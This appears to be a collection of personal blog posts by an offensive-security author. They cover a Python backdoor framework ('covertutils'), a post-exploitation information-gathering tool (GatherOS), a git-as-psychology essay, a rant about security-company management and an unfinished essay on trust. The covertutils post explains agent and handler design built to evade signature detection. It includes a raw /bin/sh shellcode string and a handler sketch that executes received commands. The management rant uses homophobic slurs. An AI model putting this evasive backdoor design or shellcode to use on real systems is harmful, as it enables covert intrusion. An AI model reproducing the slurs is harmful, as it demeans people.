Reinventing the Wheel for the last time. The “covertutils” package.

 

The motivation

Over the last few months I came across several Github projects with RAT utilities, reverse shells, DNS shells, ICMP shells, anti-DLP mechanisms, covert channels and more. Reading other people's code gave me the thoughts below:

All those things have to support at least an encryption scheme, some way of chunking and reassembling data, maybe compression, networking, error recovery. (Not to mention working-hours operation –Empire agent–, certificate pinning –meterpreter– and unit identification –pupyRAT–.)

And they all do! Their authors spent days recreating the chunking for the AES scheme, finding a way to parse the domain name out of the exfiltrating DNS request, recalculating IP packet checksums and packing them back in place, etc…

And then it hit me. A breeze of productivity. That crazy train of creation stopped just before my toenails. The door opened…

What about a framework that would handle all those by itself?

A framework that would be configurable enough to create everything from a TCP reverse shell, to a Pozzo & Lucky implementation.

A framework without even the most stable external dependencies, one that uses only Python built-ins.

And all that without even thinking about encryption, message identification, channel password protection and the rest of the stuff we hate to code.

Then I started coding. Easter found me coding. Then Easter ended and I was still coding. Then I didn’t like my repo and deleted it altogether. I recreated it and did some more coding. Spent a day trying to support Python 3 and gave up after 10 hours of frustrated coding.

And finally it started working. The “covertutils” package was born. A proud python package! And here it is for your amusement:

https://github.com/operatorequals/covertutils

And here are the docs:

https://covertutils.readthedocs.io

Let’s get to it…

 

Basic Terminology of a backdoor

So let’s break down a common backdoor payload. In a backdoor we have mainly two sides. The one that is backdoored and the one that uses the backdoor.

The host that is backdoored typically runs a process that gives unauthorized access to something (typically an OS shell). This process, and the executable (binary or shellcode) that started it, is the “Agent”.

The host that takes control of the backdoored machine typically does so using a program that interacts with the Agent in a specific way. This program is the “Handler” (from exploit/multi/handler, anyone?).

Those two have to be completely compatible for the backdoor to work. Ever noticed how Metasploit's exploit/multi/handler asks for the payload that has been run on the remote host, just to know how to treat the incoming connection? Is it a reverse_tcp VNC? A stageless reverse_tcp meterpreter?

Examining the similarities of those two (agents and handlers) helped me structure a Python API that is abstract, easy to learn, and configurable.

 

The covertutils API

All inner mechanics of the package end up in 2 major entities:

  • Handlers
    Which are abstract classes that model Backdoor Agent’s and Handler’s behavior (beaconing, silent execution, connect-back, etc).

    Attention passengers: The Handler classes are used to create both Agents and Handlers.

  • Orchestrators
    Which prepare the data that has to travel around. Encryption, chunking and steganography are handled here.

With a proper combination of those two, a very wide range of Backdoor Agents can be created. Everything from simple bind shells to reverse HTTPS shells, and from ICMP shells to Pozzo & Lucky and other stego shells.

 

The data that is transferred is also modeled in three entities:

  • Messages
    Which are the exact things that an agent has to say to a handler and vice-versa.
  • Streams
    Arbitrary names, which are tags that inform the receiver about the specific meaning of a message. Think of them almost like meterpreter channels, with the only difference that they are permanent.
  • Chunks
    Which are segmented data. They retain their Stream information though. When reassembled (using a Chunker instance) they return a (Stream, Message) tuple.

The Orchestrator

Orchestrators can be described as the “objects that decide what is gonna fly through the channel”. They transform messages and streams to raw data chunks. Generally they operate as follows:

[Image: orchestrator.png]

The chunks can then be decoded back to the original message and stream by a compatible Orchestrator instance. They are designed to produce no duplicate output! Meaning that all bytes exported from this operation seem random to an observer (one that doesn't have a compatible Orchestrator instance available). This feature exists to prevent any kind of signature creation upon the created backdoors, when their data travels around networks…

The code that actually is needed for all this magic is the following:

>>> from covertutils.orchestration import SimpleOrchestrator
>>> message = "find / -perm -4000 2>/dev/null"
>>> sorch = SimpleOrchestrator("Pa55w0rd!", streams = ['main'])
>>> chunks = sorch.readyMessage( message, 'main' )
>>> 
>>> for chunk in chunks :
...     print chunk.encode('hex')
... 
a3794050e26ad5935a1c
179083d79cad047be0a7
eb8bb3340b73ddc5eedb
af82b3a2a0f913a37a2f
3b0ddf0f365973dd4ae3
>>>

And to decode all this:

>>> sorch2 = SimpleOrchestrator("Pa55w0rd!", streams = ['main'], reverse = True)
>>> 
>>> for c in chunks :
...     stream, message = sorch2.depositChunk( c )
... 
>>> stream, message
('main', 'find / -perm -4000 2>/dev/null')
  • Note the reverse = True argument! It is used to create the compatible Orchestrator. Two identical objects are not compatible, due to the duplex One-Time-Pad encryption channel.

 

The Handler

A Handler’s basic stuff is declared in an Abstract Base Class called BaseHandler. There, 3 abstract functions are declared, to be implemented by every non-abstract subclass:

  • onMessage
  • onChunk
  • onNotRecognised

When data arrives at a Handler object, it uses the Orchestrator object it was initialized with (Handlers get initialized with an Orchestrator) to try to translate the data into a chunk. If this succeeds, the onChunk(stream, message) method runs. If the received data can't be translated into a chunk, onNotRecognised() runs instead.
Finally, if the raw data is successfully translated, the Orchestrator assembles the actual message once its last chunk is received. The onMessage(stream, message) method runs when a message is fully reassembled.
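
A minimal sketch of a concrete Handler could look as follows (the import path and method bodies are assumptions based on the docs, not copied from them):

from covertutils.handlers import BaseHandler

class PrintingHandler(BaseHandler):

    def onChunk(self, stream, message):
        # Runs for every received chunk the Orchestrator manages to translate
        print("[*] chunk arrived on stream '%s'" % stream)

    def onMessage(self, stream, message):
        # Runs once, when all chunks of a message have been reassembled
        print("[%s] %s" % (stream, message))

    def onNotRecognised(self):
        # Runs for raw data that can't be translated to a chunk
        print("[!] unrecognised data received")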

The combined idea of a backdoor can be seen in the following image (fullscreen might be needed):

[Image: covertutilsbasicbackdoor.png]

 

The Internals

How Streams are implemented

The Idea

Data needs to be tagged with a constant for the handler to understand that it is meant to consume it, since a handler may receive data that is irrelevant, not sent from the agent, etc…

This idea comes with several problems. Bypassing them is what created the concept of the stream.

First of all, the constant has to be at a specific location in the data, for the handler to know where to search for it. That brings us to the second thing:

If a constant is located at a specific data offset, it defines a pattern. And a pattern can be identified. Then escalated to analysts. Then blacklisted. Then publicly reported and blocked by public anti-virus products.

So for the tagging idea to work well, we mustn’t use a constant. Yet the handler has to understand a pattern (that can’t be understood by analysts). Considering that both the Agent and Handler share a secret (for encryption), the solution is a Cycling Algorithm!

The StreamIdentifier Class

When sharing a secret, infinite secrets are shared. If the secret is pa55phra53 then we share SHA512(“pa55phra53”) too. And MD5(“pa55phra53”). And SHA512(SHA512(“pa55phra53”)). And MD5(SHA512(“pa55phra53”+”1”)). You get the idea.

So the StreamIdentifier uses this concept to create tags that are non-repetitive and non-guessable. It uses the shared secret as seed to generate a hash (the StandardCyclingAlgorithm is used by default, a homebrew, non-secure hasher) and returns the first few bytes as the tag.

When those bytes have to be recognized by a handler, the StreamIdentifier object of the handler will create the same hash, and do the comparison.

The catch is that when another data chunk has to be sent, the StreamIdentifier object will use the last created hash as seed to produce the new tag bytes. That makes the data-tag a variable value, as it is always produced from the previous tag used plus the secret.

A sequence of such tags is called a Stream.
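
Here is a toy, standalone sketch of the cycling idea (this is not the actual StreamIdentifier code; SHA-512 stands in for the StandardCyclingAlgorithm):

import hashlib

class CyclingTagger(object):

    def __init__(self, seed, tag_len=2):
        # Seed the state with the shared secret
        self.seed, self.tag_len = seed, tag_len
        self.state = hashlib.sha512(seed).digest()

    def next_tag(self):
        # Each tag derives from the previous hash plus the secret,
        # so an observer never sees a repeating constant at a fixed offset
        self.state = hashlib.sha512(self.state + self.seed).digest()
        return self.state[:self.tag_len]

sender, receiver = CyclingTagger(b"pa55phra53"), CyclingTagger(b"pa55phra53")
assert sender.next_tag() == receiver.next_tag()   # both sides stay in sync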

Multiple Streams

Nothing stops the implementation from having multiple streams (in fact there is a probability pitfall, explained below…)! So instead of starting from “pa55phra53” and generating a single sequence of, let's say, 2-byte tags, we can start from “pa55phra531”, “pa55phra532”, “pa55phra533” … and create several such sequences (streams).

The StreamIdentifier will not only identify that the data is consumable, but will also identify whether a tag has been produced from “pa55phra531” or “pa55phra533”. This can be used to add context to the data. Say:

  • Everything produced from “pa55phra531” will be for Agent Operation Control (killswitch, mute, crypto rekeying, etc)
  • Everything produced from “pa55phra532” will be run on an OS shell
  • Everything produced from “pa55phra533” will be shellcode that has to be forked and run
  • And so on (a toy demo follows this list)…
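
Continuing the toy CyclingTagger sketch from above, identifying which stream a tag belongs to could look like this (still illustrative code, not covertutils internals):

streams = {
    "control": CyclingTagger(b"pa55phra531"),
    "shell":   CyclingTagger(b"pa55phra532"),
    "asm":     CyclingTagger(b"pa55phra533"),
}

def identify(tag):
    # Compare the incoming tag against every stream's expected next tag;
    # only the matching stream keeps its advanced state
    for name, tagger in streams.items():
        saved = tagger.state
        if tagger.next_tag() == tag:
            return name        # data is consumable; context recovered
        tagger.state = saved   # no match: rewind this stream
    return None                # unrecognised data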

Now the messages themselves do not need to follow a specific protocol, like:

shell:uname -a
asm:j\x0bX\x99Rh//shh/bin\x89\xe3\xcd\x80
control:mute

they can be raw (saving bytes on the way), relying on the stream for delivering the context (when writing a RAT'y agent, several features have to be implemented, and streams come in handy for this).

The streams are named with user-defined strings (e.g. “shell”, “control”, etc.) to help the developer.

 

The Pitfall

Tags have to be small. They shouldn't eat too much of the bandwidth; they are like protocol headers in a way. Not too small, or they could be guessed or randomly hit by a non-agent; not too big, or they would eat into the raw data.

When implementing a ton of features using streams (say 8 features), using a 2-byte tag (the default) creates a small chance of collision. Specifically a 1/2341 chance (still more probable than finding a shiny pokemon in Pokemon Silver – 1/8192).
And to make things worse: this chance is not for the whole session, but per sent chunk (as tags cycle with every chunk), so it is quite high!
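
A quick back-of-the-envelope check of that figure (plain birthday-bound arithmetic):

streams, tag_space = 8, 2 ** 16           # 8 streams, 2-byte tags
pairs = streams * (streams - 1) / 2.0     # 28 stream pairs that could collide
print(tag_space / pairs)                  # ~2340.6 -> the 1/2341 figure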

The Solution

Well, maths got us down. For that many features, one extra byte (3-byte tags) reduces the chances tremendously. There is also an option to make the tags constant. This way the above chance counts for the whole session, making a collision quite unlikely.

 

Handler Types

At the time of writing, there are several Handler classes implemented, each modelling a specific backdoor behavior.

  • BaseHandler
    This is the Base Class that exposes all abstract functions to the sub-class.
  • FunctionDictHandler
    Gets a (stream -> function) dict; for every message that arrives from stream x, the corresponding function is called with the message as its argument (a sketch follows this list).
  • InterrogatingHandler
    This handler sends a constant message across to query for data. This is the way the classic reverse_http/s agents work: they periodically query the handler for commands, which are returned as responses. It couples with the ResponseOnlyHandler.
  • ResettableHandler
    This Handler accepts a constant value that resets all resettable components to their initial state: the One-Time-Pad key, the stream seeds, the chunker's buffer, etc.
  • ResponseOnlyHandler
    This is the reverse of the InterrogatingHandler. It sits and waits for data. It sends data back only as responses to received data. Never Ad-Hoc.
  • StageableHandler
    This is a FunctionDictHandler that can be extended at runtime. It accepts serialized functions, in a special format, from a dedicated stream, adding entries to the function dict and extending functionality.
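
As a sketch of the function-dict idea (hypothetical wiring; the exact FunctionDictHandler constructor is in the covertutils docs):

import os

def shell(message):
    # Run the message as an OS command; the output gets sent back
    return os.popen(message).read()

def control(message):
    return "killed" if message == "killswitch" else "noop"

function_dict = {"shell": shell, "control": control}
# A FunctionDictHandler-style object would then call
# function_dict[stream](message) from its onMessage() implementation.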

 

Orchestrators

The objects that handle the raw data to (stream, message) conversion are the Orchestrators.

They provide the basic functionality of chunking, compression, stream tagging and encryption through 2 methods: readyMessage(message, stream) and depositChunk(raw_data). The first returns a list of chunks ready to be sent across (tagged, encrypted, etc.), and the second makes the Orchestrator try to consume received data, returning the (stream, message) tuple.

 

End of Part 1

The whole package includes several features that are not even mentioned in this article (Steganography, Data Mangling –the StegoInjector and DataTransformer classes–, etc.) that, while implemented, aren't properly documented yet, so their internals may change.

They will be the subject of another post, along with a Pozzo & Lucky implementation using only covertutils and raw sockets.

 

In the meantime, there are some Example Programs for you to play around with!

Feedback is always appreciated…

 


A Git Tutorial of Human Psychology

In Image and in Likeness

Catching Paragraph
that uses several seemingly irrelevant pieces of information to hook the reader.

The Bible says that [G|g]od created humans “In Image and in Likeness”. While I am not that huge a fan of the Bible, I do believe that some things are not randomly written in this book.

“In Image and in Likeness” is the only way to structure, design, and create something. No wonder that God created people “In Image and in Likeness” himself. He couldn't do it any other way…

 

Git is no Exception

Creating the Git version control system was also a miracle (thanks again, Linus). And it was created to resemble human nature and psychology as well. I don't claim that the author and developers had this in mind when they started their codebase, but I do believe that they couldn't help it.
Humans are doomed to duplicate themselves. In more ways than one…

 

Today’s Proof of Concept

All Git operations have human-side equivalents. Equivalents that resemble life choices and personal mind tricks. Branching, committing, rebasing, all are ways a person feels and acts about things.

 

The Childhood

Git init

“Let there be light” (this is the last biblical reference, promise).
We can draw a parallel between a person and a git repo. So here is what happens when a person is born:

God@Earth# NEW_PERSON="person-$(date +%s)-3"
God@Earth# mkdir $NEW_PERSON; cd $NEW_PERSON;
God@Earth# chroot . start_life $NEW_PERSON &

(the start_life executable starts by setting UID != 0, to avoid creating a new god.
This was the bug that created the Titans, Pantheon, Egyptian Gods and more, in the early years of development)

Because god runs Linux, and that’s for sure…

Then the person has its own process… It is alive! And this is what happens…

$ ls
$ ls -a
. ..
$ git init
Initialized empty Git repository in /.git
$

Here, we have a new proje… person! All initialized and ready to fulfill its life goals…

 

Git add

As with a new project, at first, a person adds everything inside the directory into the repo. And this isn't always good…

$ ls
mother.love    old_sister.love    father.love    mother.tongue    mother.bad_habits    father.drinking_problem
$ git add *
$ git status
On branch master

Initial commit

Changes to be committed:
  (use "git rm --cached <file>..." to unstage)

    new file:   mother.bad_habits
    new file:   father.drinking_problem 
    new file:   mother.love
    new file:   old_sister.love
    new file:   father.love
    new file:   mother.tongue
$

A child sucks in everything in its environment to slowly develop a personality, and carries all those added things with it. But a personality isn't actually created before the…

Initial Commit

And here we have the end of Childhood… A child with a distinct personality is a teenager. Almost not a child anymore…
And here is the line that differentiates the two:

$ git commit -m "Built personality PoC"
[master (root-commit) 46ae33f] Built personality PoC

 6 files changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 father.love
 create mode 100644 mother.love
 create mode 100644 mother.tongue
 create mode 100644 old_sister.love
 create mode 100644 father.drinking_problem 
 create mode 100644 mother.bad_habits
$

The Early Years

git commit

A commit happens every time a personal decision is made. As the commit is the most common command in git, it is also the most common mental action in a person's life. You commit every time the consequences of your actions will affect you as a person. Just like a commit in git, it is a command that defines a state of you.

The .gitignore file!

A teenager starts to be more selective when adding things to his/her life, and tries to evaluate whether something is crucial for their development or not.
A typical example of this is the following:

$ echo "mother.*" > .gitignore
$

This way a teenager permanently ignores all changes in their mother's behavior, effectively carving their own way. One can keep adding things to the .gitignore file as experience comes:

$ echo "*.assholes" >> .gitignore
$

Here we added the line to ignore all assholes, and prevent them from changing our life.

 

git branch

There are circumstances that you have to treat like a whole new person. There are events that need a whole fresh you when you first get into them, like relationships or hobbies. Events where every change they make to you won't affect the other aspects of your life.

Let’s say that the teenager we left off with is a boy, now ready to meet his first love, “Lily”:

$ git status
On branch master
Untracked files:
  (use "git add <file>..." to include in what will be committed)

    lily.love
$

He is going to be a boyfriend, trying to leave the rest of his life intact. He has to create a new life branch.

$ git branch boyfriend_of_lily
$

git checkout

Now, every time he is with Lily he can just:

$ git checkout boyfriend_of_lily
$

and develop his relationship with her, adding some Lily-specific files, or changing some already created ones. Also, all commits done when with Lily will affect their relationship only, not the rest of his life (hopefully).

People have countless branches. Think about hobbies, jobs and people that need a specific version of us to operate as expected… I do not treat my colleagues like my parents, and I don't cook with the same attitude I play basketball with.

Sometimes a hobby, a person, a general condition becomes so vital to us that it is not “yet another thing” we do. It is something special, something really important to us… When this time comes for one of our branches, we have to…

git merge

Here is where git shines. When we have a great hobby, one that really means a lot to us, we have to merge it into our master branch.

$ git checkout master
$ git merge hobby_that_defines_you

after that, our hobby is included in the master branch, meaning that it is an essential part of ourselves.

Problems start when some branch of ours that we want to merge into our master branch has changed our inner selves in a way that contradicts our personality.
When this happens we have the most serious of first world problems:

 

The Merge Conflict…

Let’s say that:
as a person you are cheerful and generally happy, but then you met that goth girl, who hates smiling and always wears that ring with the skull on it that gives you the creeps.

You are yourself when out with your friends, and you checkout your Emo branch when with your goth girl! Great, that's what branches are all about. But then you have to go to a party, where both your friends and your girlfriend will be there. Trying to merge those two branches raises the issue:

$ git checkout party_with_friends
$ git merge goth_girlfriend
Auto-merging attitude
CONFLICT (add/add): Merge conflict in attitude
Automatic merge failed; fix conflicts and then commit the result.
$
$ cat attitude
<<<<<<< HEAD
Happy and ready for the party!
=======
Look like I hate myself.
>>>>>>> goth_girlfriend

This issue has to be resolved. The way to resolve it is to get to that file and remove anything that doesn’t really belong to you.

I believe that all psychological problems start with such conflicts: merging incompatible branches of our egos back to master… This is because the heavy development has to be done in the master branch. The heavy development and committing has to happen in ourselves. While gaining experience we learn when to merge. We also learn when to…

 

git rebase

When a huge event like a marriage, a job, a loss, a break-up happens, our whole life is then defined by it. Our personal history can be split into before-the-event and after-the-event periods. We can remember being completely different before the event.

But now that the event has happened, and we have plenty of commits on its branch, it is actually easier to rebase our master branch onto the branch of the new event than to check out our old and dusty self – the master branch – again.

This is when a rebase happens: when we need to redefine ourselves on top of another event. Notice the difference from the merge. Merge adds some additional things to our master. Rebase redefines our master to include the additional things historically, as shown below.
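
In git terms, with a hypothetical branch name, that would be:

$ git checkout master
$ git rebase life_changing_event

Now master's history is replayed on top of the event's commits, as if the event had been its foundation all along.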

 

Concluding

And the list goes on!

  • git cherry-pick, when we try to keep only the good stuff from a situation of ours,
  • git blame when we try to find when we made the wrong choice and what went wrong,
  • git tag when we accomplish something memorable.

The next time I come across someone who believes that computer science is far away from human nature (there is such an argument), I'll answer with 2 words (kinda):

$ git --help

*mic drop*

 

Information Gathering is not enough. Information storing and sharing is better. Meet GatherOS …

I've been absent for a while; switching jobs and analyzing personal goals couldn't be postponed any longer. Now I am back on the grid! And I got a new tool too!

 

Why Gathering is a hell of a job…

Information about the target is what keeps the wheel spinning. More info, more attacks, more successful attacks, more shells, moar powah.

That applies perfectly to Vulnhub VMs and 3-4 hour CTFs, but the problem is obvious with assessments that require a team. Scalability isn't exactly great when Information Gathering has to be done for a network and several hosts. Actually, it's a pain. If you have been there you know; if you haven't, here are several examples:

- Hey, I started a minus A nmap for the slash 24
- Shit man, I am at 56 percent on the nmap.
- Ok, I control-c'd, what switches?
- Top 100, finished, come to see the results.
(Whole team leans towards a single monitor)
- OK OK, I GOT A SHELL (yelling)
- Great, what user? (yelling)
- wou wou data (www-data)
- What kernel?  (yelling)
- 3.8
- Distro?
- Ubuntu 14.04
- Check SUIDs!!!   (yelling)
- Hey buddy, stop yelling, I know what to do!
- I am not your buddy, pal
- I am not your pal, guy
- I am not your guy, friend
- I am not your...
...
- I uploaded the file!
- Good, what is the name?
- not *under* a *under* backdoor *dot* php (not_a_backdoor.php)
- Are you a moron? This is a Tomcat shit, why php?
- Who told me that?
- I told you before. (yelling)
- Oh, fuck you! You said that it 's Apache (yelling)
- Yes, it 's "Apache Tomcat" (yelling)
***Slap***

Generally, info-gathering with a team is a mess. Been there several times, yelled like this, got slapped twice, been to jail for ten long years because I killed a guy who misinterpreted 1/* for */1 in a crontab file, and then the whole team spent an hour on facebook because we failed to start our handler on time.

Tools have tried to bridge the gap. Most of them fail badly for inexperienced teams, as they need an amount of seriousness to work. Dradis falls squarely into this category. It is great, but you have to learn to use it. Who has time for that shit? Life is short. People still use metasploit.

 

GatherOS: not the nasty shit you’re waiting for…

Two things are more essential than just gathering: sharing and storing. GatherOS handles them both neatly.

The idea is simple. You got a Reverse/Bind Shell, SSH, or physical access to a system (be it Linux or –for the love of god– Windows). There is some basic stuff you have to run on the shell to understand what kind of machine you semi-pwned.

If you like the keyboard, you remember the commands (cat /etc/passwd, cat /etc/*release, crontab -l, etc.) but you will miss at least one (uname -a).

If you once liked the keyboard, you have a script with nice and dandy output.
So you python -m SimpleHTTPServer 8080 the script and then you go for the download from the pwned machine:
wget: command not found.
OK, cool. You netcat to your machine and start typing the HTTP Request:

GET /scroipt.sh HTTP/1.1


404 Not Found

Mistyped the script name…

You whisper something in the classic “fuck” pentester's dialect and open the script with gedit, copy-pasting all the commands to the reverse shell. Hating yourself.

After half an hour a colleague asks you: “what was the MAC for the 172.16.47.128 ?“.
You have no idea, you are still copy-pasting…

 

What GatherOS does…

First things first. GatherOS resides here: https://github.com/operatorequals/gatheros
and has been the subject of about 2 rewrites. It is also available through pip.
Just pip install gatheros and the commands will be in your PATH (like magic)!

Now the juicy stuff!

gatheros-exec

The heart of the package!

It's a simple python module that takes a specially formatted JSON file containing OS commands as input, and runs them against a shell (be it reverse/bind/ssh/local). Then it stores the output in a JSON file.

 

gatheros-show

The reason GatherOS exists

This module consumes JSON files created by gatheros-exec and fires up a flask web application, nicely presenting the command outputs for everyone to see and admire!

 

A showcase!

$ gatheros-exec -o /tmp/$(uname -r).json local
[waiting less than a minute...]
$ ls -lh /tmp
total 1
-rw-r--r-- 1 unused unused 110K Feb 6 13:10 4.9.0-kali1-amd64.json

And done! GatherOS ran the default InfoGathering scenario (built-in) against the local machine. For SSH on port 1022 it would be:

$ gatheros-exec -o /tmp/$(uname -r).json ssh uname@localhost -p1022

 

Now that there is a GatherOS file we could present it with gatheros-show at port 8086 (default is 8085):

$ gatheros-show /tmp/4.9.0-kali1-amd64.json -p8086

Woah! A Firefox spawned with this:


Let’s see the MAC now!

[Image: gatheros_3]

As you may have recognized, the default Information Gathering scenario is heavily based on rebootuser's cheatsheet, which I believe is the most complete cheatsheet out there! I can't but thank this site, as well as its references, for providing so many useful commands for eager privilege escalators!

A Windows Scenario will also be ready in a later release!

 

Storing the Info!

Just zip the JSON files for later use!
gatheros-show will always serve you whichever JSONs you feed it.

 

Why “Information Gathering scenarios” ?

Well, those JSONs aren't just lists of grouped commands. They contain a whole logic for which commands should run in case some others fail to run, based on a dependency-oriented model (sketched below).
This aspect of GatherOS can be used to automatically launch local-root exploits and other goodies as well, and it will be explained in a later post, when some more development has taken place!
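
Purely as an illustration of that fallback logic (this is neither GatherOS's actual scenario format nor its code):

import subprocess

# If the preferred command fails or its binary is missing,
# fall through to the next command in the chain
FALLBACK_CHAIN = [["ip", "addr"], ["ifconfig", "-a"]]

def first_working(chain):
    for cmd in chain:
        try:
            return subprocess.check_output(cmd)
        except (OSError, subprocess.CalledProcessError):
            continue   # try the next candidate
    return None

print(first_working(FALLBACK_CHAIN))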

Stay tuned, it's gonna be huge!

 

 

In the Twisted mind of Upper Management

I have written before about how compliance fucks up security; this is common ground now. This post isn't about that, as the subject has been all used up in several conferences, blog posts, drunk Red Team meet-ups and so on.

This post will talk about the nonsense that takes place inside the average Security company itself. It is really astonishing how the most absurd situations just tend to all get together and find their home in Security companies.

But this whole post isn't about that either. While some fucked up situations will be our case studies, the post will try to suggest the reason all this shit doesn't happen in companies that create refrigerators or condoms.

 

The Model

A typical security company consists of about 3 departments. There can be 4 or 6, but they simplify to the 3 below:

  • A Red Team / Penetration Testing Team
  • A Development Team
  • A Monitoring/Operations Team

And they all suck for different reasons…

 

Stating what sucks…

The Red Team

Well, the Red Team doesn't suck. Most of the time it is a bunch of folks that really know their shit, deeply and all. What does suck is that they have to report things. And those guys, most of the time, can barely talk. Imagine how painful it is for them to write stuff. For 1 hour of enjoyment (meterpreter dances, pizza breaks, pentesting vending machines and similarly hilarious stuff…) they pay a total of 7 hours hating themselves in front of a Word document, or similar text editor. At least they do what they love 1/8 of the time…

The Developers

If you take a bunch o’ monkeys and leave them in a cage with enough pot they will eventually write a Security Product for Internal Use. This is the development department. The classic UML faggotry, Java nonsense, and such clichés all apply.

And every company has their product, which of course isn't ready yet, but will be soon. And good Lord, it is gonna kick ass when it is…

Their reason for existence is simple. There can be no “Computer Company” without “Program Making”. It is well known that this is what Computers are all about: “Creating Programs” (in the twisted mind of upper management).

 

Monitoring/Operations

What sucks the most is the Monitoring part. And it sucks a lot. On a whole new, existential level.

Every guy in there wanted to be a pentester. Worse than that, they now don't know what exactly they are. And this agnostic mentality flows around the whole department. They are not sure if they maintain a Network Operations Center, a Security Operations Center, an Incident Response Center, a Log Storage Service, a Behavioral Analytics Service or a Hard Rock Cafe, whatever.

They are so clueless about their existence that they need lengthy meetings to decide if they are capable of servicing a customer that needs a very specific service. They are not sure whether they support such a service, but they go “Fuck it” and onboard him anyway.

The only group of people that knows exactly what kind of fruit the Monitoring department is, is the Upper Management (spoiler alert: it's money and a cow, what is it?)…

 

 

Why does everything suck?

Meet the Beast: Upper Management

They couldn't last a day in any department of the company. Most of the time they have no clue what the company is about. If you ask them “Tell me what your company provides, without using the word ‘Security’”, they may get an epileptic seizure the next instant.

So Security Companies are fucked up because their bosses are out collecting butterflies when they could at least study the thing they are being bosses at.

I mean, my idea of the Boss role (say, the Platonic Idea of it) is the man that does the same work as you, but way better. If someone who hires me demands that I make chickas, but can't do it himself, I can very well make chickos instead and he will barely notice (chickas and chickos are words I just invented, don't google them).

But how can this work?

Spoiler Alert: It doesn't… Have you ever heard of failure?
This situation can very well define failure. And this failure bleeds money until it goes bankrupt, really slowly.

This happens for a number of reasons. Someone needs to pay all those folks working on maintaining the illusion of security for the customers.
The Company gets its annual money from contracts and projects, but instead of spending some of that money on education, it hires more developers. Because more developers means less time for the product to come out (in the twisted mind of upper management)! And when it comes out it's gonna kick ass and stop hacking worldwide! And EVERYONE is gonna buy it at a huge price anyway…
But, unfortunately, when too many developers get together, nothing ever gets finished, so they could very well play Minecraft at LAN parties, or Dungeons & Dragons, or beat piñatas, and end up more productive than when actually coding for the project. Because development is something nearly impossible to do right (it takes a lot more than coding), and most of the time it becomes a black hole that sucks money.

In the meantime, someone among the pentesters has the free version of BurpSuite, and the Monitoring Center has an under-specced server or two…

And how it stops (not) working…

This nonsense actually has two ways to stop:

  1. Developers suck up all the money and release no product.
  2. Developers release the product.

The first scenario is simple yet amazing. A bunch of people bring a whole company down by not doing what they had to, while working every day 9:00-17:00 (sometimes even on weekends). I find this scenario amusing! It is the college project failure scaled all the way up!

But the second scenario is the one closer to reality.
When the development department proudly presents a product that has the same functionality as a forgotten project of some Chinese guy on Github, and the whole Upper Management realises that they can't sell this stuff because no one in the security industry really needs something like it (this is also the reason the Chinese guy abandoned his project back in 2014), the company breaks down. And it does so because it depended on the sales, which were supposed to be tremendous!

 

Why those tragedies do not happen in companies that manufacture refrigerators or condoms…

Upper management can very well be non-technical in refrigerator or condom companies. But the big difference between Security companies and condom companies is the following:

Upper Management people use (or have used) condoms and will never use security products (not even nmap)!

In condom companies, the people that have meetings and make choices about the company do not need a specialist to explain to them how a condom works, or why anyone would use one.

In security companies, on the other hand, the non-technical upper management has no fucking clue, and will never understand whether something is worth spending on or not. They completely lack common sense regarding their service or product.

This can be very well understood with 3 examples:

Condom makers
[The Condom Designer]: Hey boss, I believe we need to make condoms with WiFi. The budget we 'll need is 150.000$.

[The Condom Boss]: You are fired.

This boss figured out from his* experience that condoms with WiFi are useless as fuck. This Designer got sacked and he deserved it, because he wasted hours trying to budget condoms with WiFi. Fuck him.

*: or rather “her“, I prefer female bosses.

Refrigerator makers
[The Refrigerator Designer]: Hey boss, I believe that we need to make refrigerators with microphones, cameras and TCP/IP stack to ensure good quality of service (?). The budget for this is 180.000$.

[The Refrigerator Boss]: You are fired. (hopefully)

Here the boss didn’t see the opportunity of the IoT circus. But he fired the ignorant bastard just to be on the safe side…

Security providers
[The Security Designer]: Hey boss, I believe that we need to develop a tool that can compromise every operating system, platform and network.
We 're gonna write this in Java, as it is cross platform (?), and the budget for this will be 300.000$.

[The Security Boss]: This is a great idea! We are gonna invest on this!

This boss has no idea about Cobalt Strike, Metasploit, etc. Tools that have been developed for years and are the de facto standard for the industry. He has no experience in “compromising” things.
If he knew what Java is all about, he would burst into tears of laughter before the Designer could finish the proposition. (For people that don't know, Java is even worse than Ruby nowadays.)
Plus, “compromise everything” sounds too bad-ass to be cheaper than 300.000$…

 

For me the last conversation has one more line:

[God] : Hey guys, come to see those two faggots! They are gonna write metasploit again, from scratch! (laughters).
In Java! (laughters)
(...laughters echo in paradise...)

I have handed you a recipe for failure! Please stop cooking it…

 

Trust: a tale of Security, Philosophy, Reverse Engineering and Python

The role of Trust on InfoSec Incidents

Security boils down entirely to trust, if you come to think of it. Every information security incident can somehow be rephrased to include the word “Trust” among its causes. Just try any of them:

  • SQL Injections all over the Web (and the injection family of exploits): “Mistrusted user input”.
  • Cross-Site Scripting: Misplaced trust that a site will run only non-malicious code in your browser.
  • Superfish Incident: Addition of an untrusted SSL Certificate to the Trust List of all Lenovo computers.
  • Stuxnet:
    • Enough trust in a USB removable medium for it to be plugged into an “Air-gapped” computer.
    • The engineers' trust in what they saw (the backdoored health-monitoring indication of the centrifuges) rather than what they heard (the centrifuges screaming as they over-spun).
  • Heartbleed, Shellshock: Trust in Open Source code auditing (as those were glaring bugs – and not the only ones).
  • Snowden's leaks (it is a Security Incident for the 3-letter guys): Too much Trust in an employee (even a high-positioned one).
  • … add your favorite Incident here …

And I mean all Security, Crypto included…

Encryption algorithms are trusted to work. I mean, there are proofs that they work (work meaning that decryption undoes encryption), but there are no proofs that there is no easy way to deduce the key (easy meaning “easier than brute force”). There are also “Backdoored Ciphers” (with DES flirting closely with this speculation). Do we trust these? Of course not! Did we trust them before speculating or proving they were backdoored? Sure, I mean, why not (DES was the fuckin' Encryption Standard, as its name implies).

In the same manner: today we trust AES. If tomorrow we find out that there is a way to (instantly) decrypt every AES communication, we won't trust it anymore. Meanwhile, someone is reading us… And we have ourselves another trust-based security incident.

 

Why Trust anyway?

As Ernst Alexander Rauter put it in his famous “Creating subject people – How an opinion forms in the mind” (a book that isn't sold on Amazon in English – German edition only): “Trust is something that always flows upwards, from people of low power to people of higher power”. This is a very rough translation of the fact that people tend to trust things they can't manipulate. Also, people never want to feel scammed, so in defense against the exploration of an unwanted truth they prefer to just “trust”.

That’s why we trust crypto, and we trust our Operating System or our car. Because we can’t be 100% sure about their actions. So we politely assume that everything works as intended. Just to be gentle with ourselves.

 

The Trust Game in Computers

